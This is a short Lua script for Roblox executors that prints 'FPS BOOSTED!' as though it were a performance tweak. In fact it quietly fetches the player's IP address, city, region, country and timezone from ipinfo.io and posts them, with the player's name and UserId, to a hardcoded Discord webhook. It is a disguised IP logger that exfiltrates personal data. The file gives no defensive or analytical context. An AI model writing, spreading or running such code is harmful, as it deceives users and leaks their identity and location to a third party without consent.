local Hook = "https://discord.com/api/webhooks/1193355373105651722/evtlk3ZXFxi47XKcZq_zw5iR13Z0_lqzabZ-vBcAc0vPpLFszyDv7hO_JAuBo8xF2-hp"
local function Send(Webhook, Title, Message)
    local embed = {
        ["title"] = tostring(Title),
        ['description'] = Message,
        ["color"] = tonumber(000000)
    }
    local a = request({
        Url = Webhook,
        Headers = {
            ['Content-Type'] = 'application/json'
        },
        Body = game:GetService("HttpService"):JSONEncode({
            ['embeds'] = {embed},
            ['avatar_url'] = "https://cdn.discordapp.com/attachments/1089257712900120576/1105570269055160422/archivector200300015.png"
        }),
        Method = "POST"
    })
end

local function GetClientID()
    local player = game.Players.LocalPlayer
    if player then
        return player.UserId
    else
        return "N/A"
    end
end

local function IP()
    local success, response = pcall(function()
        return request({
            Url = "http://ipinfo.io/json",
            Method = "GET"
        })
    end)

    if success and response.StatusCode == 200 then
        local decodedResponse = game:GetService("HttpService"):JSONDecode(response.Body)
        local Information = "Client ID: " .. GetClientID() .. "\n"
            .. "IP: " .. decodedResponse.ip .. "\n"
            .. "City: " .. decodedResponse.city .. "\n"
            .. "Region: " .. decodedResponse.region .. "\n"
            .. "Country: " .. decodedResponse.country .. "\n"
            .. "Timezone: " .. decodedResponse.timezone

        return Information
    else
        return "Request Failure"
    end
end

print("FPS BOOSTED!")

Send(Hook, "Information: " .. game.Players.LocalPlayer.Name, IP())
